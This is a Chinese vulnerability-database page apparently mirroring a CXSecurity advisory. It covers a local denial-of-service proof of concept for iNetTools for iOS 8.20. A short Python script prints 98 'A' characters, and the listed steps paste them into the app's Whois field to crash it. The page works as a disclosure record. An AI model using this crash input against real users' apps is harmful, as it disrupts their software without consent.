投稿
https://cxsecurity.com/issue/WLB-2019110166
iNetTools For iOS 8.20 Denial Of Service - CXSecurity.com
| 漏洞ID | 1838014 | 漏洞类型 | |
| 发布时间 | 2019-11-27 | 更新时间 | 2019-11-27 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019-11-25
# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
# Software Link: App Store for iOS devices
# Tested Version: 8.20
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.2
# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as
# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
# Steps to Produce the Crash:
# 1.- Run python code: iNetTools.py
# 2.- Copy content to clipboard
# 3.- Open "iNetTools for iOS"
# 4.- Go to "Whois"
# 5.- Paste ClipBoard on "Domain Name"
# 6.- Start
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 98
print (buffer)
检索漏洞
开始时间
结束时间